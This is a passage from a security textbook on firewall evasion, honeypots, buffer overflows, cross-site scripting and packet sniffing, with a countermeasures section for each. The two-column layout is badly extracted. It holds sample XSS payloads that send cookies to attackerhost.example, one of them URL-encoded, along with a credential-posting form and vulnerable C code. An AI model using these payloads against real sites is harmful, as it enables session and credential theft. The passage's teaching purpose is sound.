tempt to provoke a response a TCP segment with the RST flag set and there- firewall allows all traffic to come in from the Internet and restricts what the
by discovers an active host or an active port on a host. Attackers might use system sends back out.
this approach rather than perform an address sweep with ICMP echo re-
A honeypot consists of a single computer that appears to be part of a net-
quests or an address scan with SYN segments because they know that many
work, but is actually isolated and protected. Honeypots can be more than
firewalls typically guard against the latter two approaches but not neces-
one computer; it is called honey net.
sarily against FIN segments. The use of TCP segments with the FIN flag set
might evade detection and thereby help the attackers succeed in their recon- By luring a hacker into a system, a honeypot serves several purposes:
naissance efforts.
i. IP Address Spoofing: IP address spoofing is one effective method to
bypass the firewall. The users gain an unauthorized access to a computer or he administrator can watch the hacker exploit the vulnerabilities of
T
a network by making it appear that the message comes from a trusted ma- the system, thereby learning where the system has weaknesses that
chine by spoofing the IP address of that machine. A basic understanding need to be redesigned.
of these headers and network exchanges is essential to the whole process. he hacker can be caught and stopped while trying to obtain root ac-
T
Internet protocol (IP) is a network protocol operating at the network layer of cess to the system.
the OSI model. This protocol is connectionless and has no information re-
garding transaction state, which is used to route data packets on a network. By studying the activities of hackers, designers can create more secure
systems that are potentially less vulnerable to future attack. Although most
ii. Source Routing: Source routing is another method to bypass the honeypots have a similar general purpose, there are actually different types
firewall and the packets sender can designate the route that a packet should of honeypots that fulfil different functions.
take through the network. When these packets travel among the nodes in
the network, each router will check IP address of the destination in these
packets and choose the next node to forward them. In source routing, the There are following types of honeypots:
sender makes some or all of these decisions on the router.
Low Interaction Honeypots
iii. Tiny Fragments: The way of tiny fragments is also an effective meth-
od to bypass the firewall and in this means, the user uses the IP fragmen- Low Interaction Honeypots allow only limited interaction for an attacker or
tation to create extremely small fragments and force the TCP header infor- malware. All services offered by a Low Interaction Honeypots are emulated.
mation into separated packet fragments. This way is designed to bypass the Thus Low Interaction Honeypots are not themselves vulnerable and will not
filtering rules that depend on TCP header information. The users hope that become infected by the exploit attempted against the emulated vulnerability.
only the first fragment is examined by the filtering router and the remaining
Example: Specter, Honeyed and KFSensor
fragments are passed through.
High Interaction Honeypots
High Interaction Honeypots make use of the actual vulnerable service or
Honeypot
software. High-interaction honeypots are usually complex solutions as they
A honeypot is a computer system on the Internet that is set up to attract involve real operating systems and applications. In High Interaction Hon-
and trap people who attempt to attack other peoples computer systems. eypots, nothing is emulated, everything is real. High Interaction Honeypots
provide a far more detailed picture of how an attack or intrusion progresses
Honeypots are designed to mimic systems that an intruder would like to or how a particular malware executes in real-time. Since there is no emulat-
break into but limit the intruder from having access to an entire network. If ed service, High Interaction Honeypots helps in identifying unknown vulner-
hacking a honeypot is successful, the intruder will have no idea that she/he abilities. But High Interaction Honeypots are more prone to infections and
is being tricked and monitored. High Interaction Honeypots increases the risk because attackers can use
Most honeypots are installed inside firewalls so that they can better be con- these real honeypot operating systems to attack and compromise production
trolled, though it is possible to install them outside of firewalls. A firewall in systems.
a honeypot works in the opposite way that a normal firewall works: instead Example: Symantec Decoy Server and Honetnets.

Detecting Honeypots: big organization that has huge amount of network devices and serv-
A
ers to manage must use Security Information Management (SIM) sys-
Attackers can determine the presence of honeypots by probing the services
tems like NetIQ, Arc Sight or Net Forensic etc. This makes the job easy
running on the system. Attackers craft malicious probe packets to scan for
for a security administrator to monitor huge networks for any kind of
services such as HTTP over SSL (HTTPS), SMTP over SSL (SMTPS) and IMAP
security alerts.
over SSL (IMAPS). Ports that shows particular services running but deny a
three-way handshake connection indicate the presence of a honeypot. Some ecurity should not be confined to just perimeter level but rather it
S
of the tools that can be used to probe honeypots include: should also be considered seriously at the desktop level which are at-
tached to the corporate network.
Send-safe Honeypot: It is a tool designed for checking lists of HTTPS
and SOCKS proxies for so-called Honeypots.
Nessus Security Scanner: The Nessus Security Scanner has the abil-
ity to test SSLized services such as https, smtps and more. Nessus can be
provided with a certificate so that it can be integrated into a PKI-fied envi-
ronment.
Countermeasures:
Countermeasures for corporate end-users or home pc users:
The desktop Anti-Virus (AV) signature must be kept up-to-date.
Dont open attachments unless you are sure of its authenticity.
Make sure the system is updated with the latest security patches.
If possible, install a desktop based firewall
lways do a virus scan for any external drives when attached to the
A
system
Never download any free tool if you are not sure of its authenticity.
Always stay tuned with latest virus alerts or outbreaks.
Countermeasures for corporate security administrators:
The AV gateway must have the entire signature up-to-date to be
pushed into its client PCs.
A content filter at the SMTP gateway is always advisable.
esktops attached to the corporate network must be installed with
D
latest security patches.
here must be a patch management system like (SMS or SUS) in place
T
and the systems must be updated with the latest security patches.
onduct anti-virus schedule scan on all the desktops attached to the
C
corporate network
IDS if installed would be a great device to keep you alerted about any
attack in the network but it would be really helpful if an IPS can be
afforded.

Chapter 7.
Various Attacks Method &
their Countermeasures-II
BUFFER OVERFLOW ATTACK
Objective
Introductions
Buffer means temporary data storage area. Buffers are data storage areas,
Stack & Heap
which generally hold a predefined amount of finite data.
Reasons for Buffer Overflow Attack
Types of Overflow
Buffer Overflow Threats What Is a Stack?
Buffer Overflow and Web Applications A stack is an abstract data type frequently used in computer science. A
Countermeasures stack of objects has the property that the last object placed on the stack will
be the first object removed. This property is commonly referred to as last in,
On Oct.19, 2000, hundreds of flights were grounded or delayed because of first out queue or a LIFO.
a software problem in the Los Angeles air traffic control system. The cause
was attributed to a controller typing 9 characters (instead of five) of flight
description data, resulting in the buffer overflow.
A buffer overflow occurs when a program or process tries to store more
data in a buffer (temporary data storage area) than it was intended to
hold. Since buffers are created to contain a finite amount of data, the extra
information - which has to go somewhere - can overflow into adjacent buf-
fers, corrupting or overwriting the valid data held in them. Although it may
occur accidentally through programming error, buffer overflow is an increas-
ingly common type of security attack on data integrity. In buffer overflow
attacks, the extra data may contain codes designed to trigger specific
actions, in effect sending new instructions to the attacked computer
that could, for example, damage the users files, change data, or disclose
confidential information.
Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in con-
trast, reduces the stack size by one by removing the last element at the top
of the stack.

To summarize the stack: space, whereas heaps are dynamic memory address spaces that occur while
a program is running. A heap-based buffer overflow occurs in the lower part
he stack grows and shrinks as functions push and pop local
T
of the memory and overwrites other dynamic variables. As a consequence,
variables
a program can open a shell or command prompt or stop the execution of a
here is no need to manage the memory yourself, variables are
T program. The next section describes stack-based buffer overflow attacks.
allocated and freed automatically
The stack has size limits
tack variables only exist while the function that created them, is
S Reasons for Buffer Overflow Attack:
running Buffer Overflow attacks depend on two things:
The lack of boundary testing
Why Do We Use a Stack?
machine that can execute a code that resides in the data/stack
A
Modern computers are designed with the need of high-level languages in segment
mind. The most important technique for structuring programs introduced
The lack of boundary testing is common, and it is usually the ends with the
by high-level languages is the procedure or function. From one point of view,
segmentation fault or bus error.
a procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the In order to exploit buffer overflow to gain access to or escalate privileges, the
statement or instruction following the call. This high-level abstraction is offender must create the data to be fed to the application. Random data gen-
implemented with the help of the stack. erates a segmentation fault or bus error, never a remote shell or the execu-
tion of a command.
The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions and to return values from the
function.
PROCESS MEMORY ORGANIZATION:
To understand stack buffers, we must first understand how a process is or-
What Is a Heap? ganized in memory. Processes are divided into three regions:
The heap is a region of your computers memory that is not managed au- Text, Data, and Stack. We will concentrate on the stack region, but first a
tomatically for you and is not as tightly managed by the CPU. It is a more small overview of the other regions is in order.
free-floating region of memory (and is larger).
The text region is fixed by the program and includes code (instructions) and
To allocate memory on the heap, you must use malloc() or calloc(), which read-only data. This region corresponds to the text section of the executable
are built-in C functions. Once you have allocated memory on the heap, file. This region is normally marked read-only and any attempt to write to it
you are responsible for using free() to deallocate that memory when you will result in a segmentation violation.
dont need it any more. If you fail to do this, your program will have what
The data region contains initialized and uninitialized data. Static variables
is known as a memory leak. That is, memory on the heap will still be set
are stored in this region. The data region corresponds to the data-bss sec-
aside (and wont be available to other processes).
tions of the executable file. Its size can be changed with the brk system call.
Unlike the stack, the heap does not have size restrictions on variable size If the expansion of the bss data or the user stack exhausts available mem-
(apart from the obvious physical limitations of your computer). Heap memory, the process is blocked and is rescheduled to run again with a larger
ory is slightly slower to be read from and written to, because one has to use memory space. New memory is added between the data and stack segments.
pointers to access memory on the heap. Unlike the stack, variables creat-
ed on the heap are accessible by any function, anywhere in your program.
Heap variables are essentially global in scope.
The stack and the heap are storage locations for user-supplied variables
within a running program. Variables are stored in the stack or heap un-
til the program needs them. Stacks are static locations of memory address

Types of Buffer Overflows
The two types of buffer overflows are:

Stack-based:
A buffer is simply some fixed space in memory used to store data. In C, you
create a buffer by declaring an array of some primitive type such as a char
array [SIZE] or int array [SIZE] . When these arrays are declared, the space
for their data is allocated on the stack. The key point is that the space is
fixed.
A stack based buffer overflow occurs when more data than what was allo-
cated is put into the buffer and the excess data overflows into other stack
memory space.
Stack-based buffer overflows are exploitable because of the way the stack
allocates stack frames when functions are called. Every time a function is
called the return address to jump back to the previously executing function
is stored on the stack.
The data that overflows in the current stack frame can overwrite data in the
THERE ARE TWO MAIN TYPES OF BUFFER OVERFLOW ATTACKS:
previous stack frame, manipulating the return address. Heres an example
STACK BASED AND HEAP BASED. of an exploitable buffer overflow.
Heap-based attacks flood the memory space reserved for a program, but the #include <stdio.h>
difficulty involved with performing such an attack makes them rare. Stack- #include <stdlib.h>
based buffer overflows are by far the most common. #include <string.h>
In a stack-based buffer overrun, the program being exploited uses a memo-
voidfunction(char*in) {
ry object known as a stack to store user input. Normally, the stack is empty
charbuf[16];
until the program requires user input. At that point, the program writes a
strcpy(buf, in);
return memory address to the stack and then the users input is placed on
}
top of it. When the stack is processed, the users input gets sent to the re-
turn address specified by the program.
intmain(intargc, char**argv) {
However, a stack does not have an infinite potential size. The programmer function(argv[0]);
who develops the code must reserve a specific amount of space for the stack. return0;
If the users input is longer than the amount of space reserved for it within }
the stack, then the stack will overflow. This in itself isnt a huge problem,
but it becomes a huge security hole when combined with malicious input.

STACK-BASED BUFFER OVERFLOWS To detect program buffer overflow vulnerabilities that result from poorly
written source code, a hacker sends large amounts of data to the application
The following are the steps a hacker uses to execute a stack-based buffer
via a form field and sees what the program does as a result.
overflow:
1. nter a variable into the buffer to exhaust the amount of memory in
E
the stack. Buffer Overflow Threats:
2. nter more data than the buffer has allocated in memory for that
E A Buffer Overflow is a flaw that occurs when more data is written to a block of
variable, which causes the memory to overflow or run into the memory memory or buffer, than the buffer is allocated to hold. Exploiting a buffer over-
space for the next process. Then, add another variab and overwrite the flow allows an attacker to modify portions of the target process address space.
return pointer that tells the program where to return to after execut- This ability can be used for a number of purposes, including the following:
ing the variable.
3. program executes this malicious code variable and then uses the
A
return pointer to get back to the next line of executable code. If the Control the process execution
hacker successfully overwrites the pointer, then the program executes Crash the process
the hackers code instead of the program code.
Modify internal variables
HEAP-BASED BUFFER OVERFLOWS

The attackers goal is almost always to control the target process execution.
Exploitation of a buffer overflow on the heap is similar to exploiting a stack This is accomplished by identifying a function pointer in memory that can
based overflow, except that no return addresses are stored in this segment be modified, directly or indirectly, using the overflow. When such a pointer
of memory. Therefore, an attacker must use other techniques to gain con- is used by the program to direct program execution through a jump or call
trol of the execution-flow. An attacker could overwrite a function pointer or instruction, the attacker-supplied instruction location will be used, thereby
perform an indirect pointer overwrite on pointers stored in these memory allowing the attacker to control the process.
regions, but these are not always available. Overwriting the memory man-
agement information that is generally associated with dynamically allocated In many cases, the function pointer is modified to reference a location where
memory is a more general way of exploiting a heap-based overflow. Memory the attacker has placed assembled machine-specific instructions. These
allocators allocate memory in chunks. These chunks typically contain mem- instructions are commonly referred to as shell code, in reference to the fact
ory management information (referred to as chunk info) alongside the actual that attackers often wish to spawn a command-line environment, or shell, in
data (chunk data). Many different allocators can be attacked by overwriting the context of the running process.
the chunk info.
Buffer Overflow and Web Applications

Attackers use buffer overflows to corrupt the execution stack of a web appli-
cation. By sending carefully crafted input to a web application, an attacker
can cause the web application to execute arbitrary code effectively taking
over the machine.
Buffer overflow flaws can be present in both the web server or application serv-
er products that serve the static and dynamic aspects of the site or the web
application itself. Buffer overflows found in widely used server products are
likely to become widely known and can pose a significant risk to users of these
products. When web applications use libraries, such as a graphics library to
generate images, they open themselves to potential buffer overflow attacks.
Buffer overflows can also be found in custom web application code, and may
even be more likely given the lack of scrutiny that web applications typically
go through. Buffer overflow flaws in custom web applications are less likely
to be detected because there will normally be far fewer hackers trying to find

and exploit such flaws in a specific application. If discovered in a custom condition if an attacker can influence the contents of the string parameter.
application, the ability to exploit the flaw other than to crash the application
Example 3
is significantly reduced by the fact that the source code and detailed error
messages for the application are normally not available to the hacker. The excerpt below calls the gets() function in C, which is inherently unsafe.
(Bad Code)
THE METHOD Example Language: C
For a buffer overrun attack to be possible and be successful, the following char buf[24];
events must occur and in this order: printf(Please enter your name and press <Enter>\n);
1. A buffer overflow vulnerability must be found, discovered or identified. gets(buf);
2. The size of the buffer must be determined. ...
3. The attacker must be able to control the data written into the buffer. }
4. here must be security sensitive variables or executable program in-
T
structions stored below the buffer in memory. However, the programmer uses the function gets() which is inherently un-
5. argeted executable program instructions must be replaced with other
T safe because it blindly copies all input from STDIN to the buffer without
executable instructions. restricting how much is copied. This allows the user to provide a string that
Example Buffer Overflow is larger than the buffer size, resulting in an overflow condition.
Example 1
char last_name[20]; PREVENTION
printf (Enter your last name: ); 1. Use Different Language Tools:

scanf (%s, last_name); Language tools that provide automatic bounds checking such as Perl, Py-
thon and Java. However, this is usually not possible or practical when you
consider almost all modern operating systems in use today are written in the
The problem with the code above is that it does not restrict or limit the size C language. The language tool becomes particularly critical when low-level
of the name entered by the user. If the user enters Very_very_long_last_ hardware access is necessary. The good news is with languages evolving,
name which is 24 characters long, then a buffer overflow will occur since language and code security has becoming a serious issue. For example,
the array can only hold 20 characters total. Microsoft in their .NET initiative has completely re-written Visual Basic and
Visual C++ with string safe security in mind. Additionally, they have added
the Visual C# tool which was designed from the ground up with security in
Example 2 mind.
The following code attempts to create a local copy of a buffer to perform
some manipulations to the data.
2. Eliminate The Use of Flawed Library Functions.
(Bad Code)
Programming languages are only as flawed as the programmer allows them
Example Language: C to be. In our demonstration, we utilized three flawed functions from the
void manipulate_string(char* string){ Standard C Library (gets (), strcpy, and strcmp). These are just three of
char buf[24]; many such functions that fail to check the length or bounds of their argu-
ments. For instance, we could have completely eliminated the buffer over-
strcpy(buf, string);
flow vulnerability in our demonstration by changing one line of code. This
} simple change informs strcpy () that it only has an eight-byte destination
However, the programmer does not ensure that the size of the data pointed buffer and that it must discontinue raw copy at eight bytes. The persistence
to by string will fit in the local buffer and blindly copies the data with the of programming errors of this nature may indeed be related to the manner in
potentially dangerous strcpy() function. This may result in a buffer overflow which we train and educate young programmers. One can pick up an intro-

ductory college textbook on C or C++ and find this set of flawed functions 8. Disable Stack Execution:
introduced by the third chapter. Sure, they make great training aids. Howev-
Although it requires the operating system kernel to be recompiled, patches
er, humans are creatures of habit and tend to use what they know best and
are available for some versions of UNIX that render the stack non-execut-
are most comfortable with.
able. Since most buffer overrun exploits depend on an executable stack, this
modification will essentially stop them dead in their tracks.
3. Design and Build Security within Code:
It takes more work and more effort, but software can be designed with se- 9. Know What Is On Your System:
curity foremost in mind. Visual C++ is Microsofts proprietary version of the
Awareness of what is on your system and who has the privileges to execute
C++ language. The previous example, we could have yet added one extra
it is essential. SUID root executable and root owned world writable files and
step to assure complete buffer safety. Again, this may go back to how we
directories are the favourite target of many attacks. Find them, list them,
train programmers. Is code security taught and encouraged? Are they given
and know them.
the extra time to design security within their code? Typically, and unfortu-
nately, the answer to these questions is no.
10. Patch The Operating System and Application:

4. Use Safe Library Modules: Perhaps the very best defence is to stay informed and
remain offensive. As new vulnerabilities are discov-
String safe library modules are available for use, even in problematic lan-
ered and reported, apply the necessary patches and
guages such as C++. For instance, the C++ Standard Template Library of-
fixes promptly. If you are in a Microsoft shop, this may
fers the Class String in its standard namespace. The String Class provides
get very tiresome very quickly. It may even seem like an
bounds checking within its functions and be preferred for use over the stan-
endless task.
dard string handling functions.
XSS - CROSS-SITE SCRIPTING

5. Use Available Middleware Libraries:
Several freeware offerings of safe libraries are available for use. For in-
stance, Bell Labs developed the libsafe24 library to guard against unsafe Cross-Site Scripting (also known as XSS) is one of the most common appli-
function use. Libsafe works on the structure of stack frame linkage through cation-layer web attacks. XSS vulnerabilities target scripts embedded in a
frame pointers by following frame pointer to the stack frame that allocated page that are executed on the client-side (in the users web browser) rather
a buffer. When a function executes, it can then prevent the return address than on the server-side. XSS in itself is a threat that is brought about by
from being overwritten. However, libsafe is not without security problems of the internet security weaknesses of client-side scripting languages, such
its own as it has been reported that libsafes protections can be bypassed in as HTML and JavaScript. The concept of XSS is to manipulate client-side
a format-string-based attack by using flag characters that are used by glibc scripts of a web application to execute in the manner desired by the mali-
but not libsafe. cious user. Such a manipulation can embed a script in a page that can be
executed every time the page is loaded, or whenever an associated event is
performed.
6. Use Source Code Scanning Tools:
XSS is the most common security vulnerability in software today. This
Several attempts have been made to design a tool that performs analysis on should not be the case as XSS is easy to find and easy to fix. XSS vulnera-
raw source code with the hope of identifying undesirable constructs to in- bilities can have consequences such as tampering and sensitive data theft.
clude buffer vulnerabilities.
XSS vulnerability arises when web applications take data from users and
dynamically include it in web pages without first properly validating the
data. XSS vulnerabilities allow an attacker to execute arbitrary commands
7. Use Compiler Enhancement Tools:
and display arbitrary content in a victim users browser. A successful XSS
Although a relatively new concept, several compiler add-on tools have re- attack leads to an attacker controlling the victims browser or account on
cently been made available which work closely with function return address the vulnerable web application. Although XSS is enabled by vulnerable pag-
space to prevent overwriting.

es in a web application, the victims of an XSS attack are the applications . The Response.Redirect call will be something like the following.
users, not the application itself. The potency of an XSS vulnerability lies in
Response.Redirect(Login.asp?ErrorMessage=Invalid+username+or+pass-
the fact that the malicious code executes in the context of the victims ses-
word)
sion, allowing the attacker to bypass normal security restrictions.
Then, in Login.asp, the error message query string value would be displayed
as follows:
DESCRIPTION
Web sites today are more complex than ever and often contain dynamic con-
tent to enhance the user experience. Dynamic content is achieved through As in the code for Login.asp, the ErrorMessage query string value will be
the use of Web applications that can deliver content to a user according to emitted, producing the following HTML page:
their settings and needs.
While performing different user customizations and tasks, many sites take
input parameters from a user and display them back to the user, usually as
a response to the same page request. Examples of such behavior include the
following.
earch engines which present the search term in the title (Search Re-
S
sults for: search_term) The attacker embedded HTML code into this page in such a way that when
users browse this page, their supplied username and password are submit-
Error messages which contain the erroneous parameter ted to the following page.
Personalized responses (Hello, username) http://www.hax0r.com/stealPassword.asp
Cross-site scripting attacks occur when an attacker takes advantage of such An attacker can send a link to the contrived page via an email message or a
applications and creates a request with malicious data (such as a script) link from some message board site, hoping that a user will click on the link
that is later presented to the user requesting it. The malicious content is and attempt to login. Of course, by attempting to login, the user will be sub-
usually embedded into a hyperlink, positioned so that the user will come mitting his username and password to the attackers site.
across it in a web site, a Web message board, an email, or an instant mes-
sage. If the user then follows the link, the malicious data is sent to the Web
application, which in turn creates an output page for the user, containing
There are three types of Cross-site Scripting attacks: non-persistent,
the malicious content. The user, however, is normally unaware of the attack
persistent and DOM-based.
and assumes the data originates from the Web server itself, leading the user
to believe this is valid content from the Web site. Non-persistent attacks and DOM-based attacks require a user to either visit a
specially crafted link laced with malicious code or visit a malicious web page
For example, consider a Web application that requires users to log in to visit
containing a web form, which when posted to the vulnerable site, will mount
an authorized area. When users wish to view the authorized area, they pro-
the attack. Using a malicious form will oftentimes take place when the vul-
vide their username and password, which is then checked against a user
nerable resource only accepts HTTP POST requests. In such a case, the form
database table. Now, assume that this login system contains two pages:
can be submitted automatically, without the victims knowledge (e.g. by using
Login.asp, which created a form for the users to enter their username and
JavaScript). Upon clicking on the malicious link or submitting the malicious
password; and the page CheckCredentials.asp, which checks if the sup-
form, the XSS payload will get echoed back and will get interpreted by the
plied username/password are valid. If the username/password are invalid,
users browser and execute. Another technique to send almost arbitrary re-
CheckCredentials.asp uses (for example) a Response.Redirect to send the
quests (GET and POST) is by using an embedded client, such as Adobe Flash.
user back to Login.asp, including an error message string in the query string
Persistent attacks occur when the malicious code is submitted to a web site
where its stored for a period of time. Examples of an attackers favorite tar-
gets often include message board posts, web mail messages, and web chat
software. The unsuspecting user is not required to interact with any addi-
tional site/link (e.g. an attacker site or a malicious link sent via email), just
simply view the web page containing the code.

PERSISTENT ATTACK EXAMPLE http://portal.example/index.php?sessionid=12312312&
Many web sites host bulletin boards where registered users may post mes- username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65
sages which are stored in a database of some kind. A registered user is %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70
commonly tracked using a session ID cookie authorizing them to post. If an
attacker were to post a message containing a specially crafted JavaScript, a %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65
user reading this message could have their cookies and their account com- %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F
promised. %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64
Cookie Stealing Code Snippet: %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73
<SCRIPT> %63%72%69%70%74%3E
document.location= http://attackerhost.example/cgi-
Decoded example of Cookie Stealing URL:
bin/cookiesteal.cgi?+document.cookie
http://portal.example/index.php?sessionid=12312312&
</SCRIPT>
username=<script>document.location=http://attackerhost.example/cgi-
Due to the fact that the attack payload is stored on the server side, this form bin/cookiesteal.cgi?+document.cookie</script>
of xss attack is persistent.
DOM-BASED ATTACK EXAMPLE

NON-PERSISTENT ATTACK EXAMPLE
Unlike the previous two flavours, DOM based XSS does not require the web
Many web portals offer a personalized view of a web site and may greet a server to receive the malicious XSS payload. Instead, in a DOM-based XSS,
logged in user with Welcome, <your username>. Sometimes the data ref- the attacker abuses runtime embedding of attacker data in the client side,
erencing a logged in user is stored within the query string of a URL and from within a page served from the web server.
echoed to the screen
Consider an HTML web page which embeds user-supplied content at client
side, i.e. at the users browser. This in fact is a well established practice. For
example, an HTML page can have JavaScript code that embeds the location/
Portal URL example:
URL of the page into the page. This URL may be partly controlled by the at-
http://portal.example/index.php?sessionid=12312312&username=Joe tacker.
In the example above we see that the username Joe is stored in the URL. In such case, an attacker can force the client (browser) to render the page
The resulting web page displays a Welcome, Joe message. If an attacker with parts of the DOM (the location and/or the referrer) controlled by the
were to modify the username field in the URL, inserting a cookie-stealing Ja- attacker. When the page is rendered and the data is processed by the page
vaScript, it would possible to gain control of the users account if they man- (typically by a client side HTML-embedded script such as JavaScript), the
aged to get the victim to visit their URL. pages code may insecurely embed the data in the page itself, thus delivering
the cross-site scripting payload.
A large percentage of people will be suspicious if they see JavaScript embed-
ded in a URL, so most of the time an attacker will Encode their malicious
payload within URL similar to the example below.
URL Encoded example of Cookie Stealing URL:

For example: ceive the payload, it is important to note that the server does not necessarily
embed the payload into the response page - the essence of DOM based XSS
Assume that the URL
is that the client-side code does the embedding.
http://www.vulnerable.site/welcome.html
The DOM-based XSS attack concept is extended into the realm of non-JS
Contains the following content: client side code, such as Flash. A Flash object is invoked in the context of
<HTML> a particular site at the client side and some environment information is
<TITLE>Welcome!</TITLE> made available to it. This environment enables the Flash object to query
the browser DOM in which it is embedded.
Hi
<SCRIPT>
var pos=document.URL.indexOf(name=)+5; CROSS-SITE SCRIPTING WORMS AND MALWARE
document.write(document.URL.substring(pos,document.URL.length)); The best example of a Web Worm is the Samy Worm, the first major worm of
</SCRIPT> its kind, spread by exploiting a persistent Cross-Site Scripting vulnerability
in MySpace.coms personal profile web page template. In October of 2005,
Welcome to our system
Samy Kamkar, the worm author, updated his profile Web page with the first
</HTML> copy of the JavaScript exploit code. MySpace was performing some input
filtering blacklists to prevent XSS exploits, but they were far from perfect.
Using some filter-bypassing techniques, Samy was successful in uploading
This page will use the value from the name parameter in the following his code.
manner.
When an authenticated MySpace user viewed Samys profile, the worm pay-
http://www.vulnerable.site/welcome.html?name=Joe load using XHR, forced the users web browser to add Samy as a friend, in-
In this example the JavaScript code embeds part of document.URL (the page clude Samy as the users hero (but most of all, samy is my hero), and alter
location) into the page, without any consideration for security. An attacker the users profile with a copy of the malware code. Starting with a single vis-
can abuse this by luring the client to click on a link such as itor the Samy Worm infection grew exponentially to over 1,000,000 infected
user profiles in under 24 hours. MySpace was forced to shut down its web-
http://www.vulnerable.site/welcome.html?name= site in order to stop the infection, fix the vulnerability and perform clean up.
<script>alert(document.cookie)</script>
IMPACT OF CROSS-SITE SCRIPTING

There are several DOM objects which can serve as a vehicle to such attack, When attackers succeed in exploiting XSS vulnerabilities, they can gain ac-
which will embed the malicious JavaScript payload into the page at runtime. cess to account credentials. They can also spread web worms or access the
1. he path/query part of the location/URL object, in which case the
T users computer and view the users browser history or control the browser
server does receive the payload as part of the URL section of the HTTP remotely. After gaining control to the victims system, attackers can also an-
request. alyze and use other intranet applications.
2. he username and/or password part of the location/URL object
T By exploiting XSS vulnerabilities, an attacker can perform malicious actions,
(http:// username:password@host/...), in which case the server re- such as:
ceives the payload, Base64-encoded, in the Authorization header.
Hijack an account.
3. he fragment part of the location/URL object, in which case the serv-
T Spread web worms.
er does not receive the payload at all (!), because the browser typically Access browser history and clipboard contents.
does not send this part of the URL. Control the browser remotely.
4. he referrer object, in which case the server receives the payload in
T Scan and exploit intranet appliances and applications.
the Referer header.
It is quite possible that other DOM objects can be used too, particularly if
the DOM is extended. At any case, while in some vehicles the server does re-

Identifying Cross-Site Scripting Vulnerabilities 1. Introduction of Sniffing
XSS vulnerabilities may occur if: A packet sniffer is a utility that has been used since the original release of
Ethernet. Packet sniffing allows individuals to capture data as it is trans-
Input coming into web applications is not validated
mitted over a network. Packet sniffer programs are used by network pro-
Output to the browser is not HTML encoded fessionals to diagnose network issues and by malicious users to capture
unencrypted data like passwords and usernames in network traffic. Once
this information is captured, the user can then gain access to the system or
CROSS-SITE SCRIPTING COUNTER-MEASURES network.
Cross-site Scripting (XSS) is a threat that involves executing attacker-sup-

plied JavaScript code in the users browser. There are 2 measures to prevent
XSS attacks.
Input Validation
When accepting user input, you should assume that all user input is mali-
cious. A good strategy is to implement an input validation/sanitation mod-
ule of un-trusted user data from HTTP requests in the form of URL param-
eters, HTML form fields, HTTP headers, or HTTP cookies. In addition, data
that comes from databases, backend web services, and other data sources
may also contain malicious user input and should be considered un-trust-
ed as well.
Output Escaping
Sniffers are used to capture traffic sent between two systems. Depending on
Output escaping is another important measure against XSS attacks. Output
how the sniffer is used and the security measures in place, a hacker can use
escaping is a technique to make sure that when reflected to the browser,
a sniffer to discover usernames, passwords and other confidential informa-
special characters in user input such as <script> will be interpreted by the
tion transmitted on the network. Several hacking attacks and various hack-
browser as regular html content but not part of the JavaScript code.
ing tools require the use of a sniffer to obtain important information sent
from the target system. This chapter will describe how sniffers work and
identify the most common sniffer hacking tools.
SNIFFERS
Packet sniffing is a form of wire-tap applied to computer networks instead
Objective of phone networks. It came into vogue with Ethernet, which is known as a
Introduction of Sniffing shared medium network. This means that traffic on a segment passes by
all hosts attached to that segment. Ethernet cards have a filter that prevents
Sniffing Threats
the host machine from seeing traffic addressed to other stations. Sniffing
Types of Sniffing programs turn off the filter and thus see everyones traffic.
Sniffing Attacks Todays networks are increasingly employing switch technology, prevent-
Sniffing Tools ing this technique from being as successful as in the past. It is still useful,
Countermeasures though, as it is becoming increasingly easy to install remote sniffing pro-
grams on servers and routers, through which a lot of traffic flows.

2. SNIFFING THREATS
Todays networks may already contain built-in sniffing modules. Most hubs
support the RMON standard, which allow the intruder to sniff remotely us-
ing SNMP, which has weak authentication. Many corporations employ Net-
work Associates Distributed Sniffer Servers, which are set up with easy to
guess passwords. Windows NT machines often have a Network Monitoring
Agent installed, which again allows for remote sniffing.
Packets sniffing are difficult to detect, but it can be done. The difficulty of
the solution means that in practice, it is rarely done.
The popularity of packet sniffing stems from the fact that it sees everything.
Typical items sniffed include:
SMTP, POP, IMAP traffic

Allows intruder to read the actual e-mail.
POP, IMAP, HTTP Basic, Telnet authentication

B. Active Sniffing
Reads passwords off the wire in clear-text.
Active sniffing involves launching an Address Resolution Protocol (ARP) spoof-
ing or traffic-flooding attack against a switch in order to capture traffic. A
SMB, NFS, FTP traffic switched network operates differently. The switch looks at the data sent to it
Reads files of the wire. and tries to forward packets to their intended recipients based on MAC ad-
dress. The switch maintains a MAC table of all the systems and the port num-
bers to which theyre connected. This enables the switch to segment the net-
SQL database work traffic and send traffic only to the correct destination MAC addresses.
Reads financial transactions and credit card numbers.
Not only can sniffing read information that helps break into a system, it is an
intrusion by itself because it reads the very files the intruder is interested in.
3. TYPES OF SNIFFING
A. Passive Sniffing
Passive sniffing involves listening and capturing traffic and is useful in a
network connected by hubs. In networks that use hubs or wireless media
to connect systems, all hosts on the network can see all traffic; therefore,
a passive packet sniffer can capture traffic going to and from all hosts con-
nected via the hub.

4. SNIFFING ATTACKS ARP poisoning is very effective against both wireless and wired local net-
works. By triggering an ARP poisoning attack, hackers can steal sensitive
A sniffer can be a packet-capturing or frame-capturing tool. It intercepts
data from the targeted computers, eavesdrop by means of man-in-the-mid-
traffic on the network and displays it in either a command-line or GUI for-
dle techniques, and cause a denial of service on the targeted computer. In
mat for a hacker to view. Some sophisticated sniffers interpret the packets
addition, if the hacker modifies the MAC address of a computer that enables
and can reassemble the packet stream into the original data, such as an
Internet connection to the network, access to Internet and external networks
e-mail or a document. Sniffers are used to capture traffic sent between two
may be disabled.
systems. Depending on how the sniffer is used and the security measures
in place, a hacker can use a sniffer to discover usernames, passwords and For smaller networks, using static ARP tables and static IP addresses is an
other confidential information transmitted on the network. effective solution against ARP poisoning. Another effective method for all
kinds of networks is implementing an ARP monitoring tool.
To prevent ARP spoofing, permanently add the MAC address of the gate-
ARP POISONING
way to the ARP cache on a system. You can do this on a Windows system by
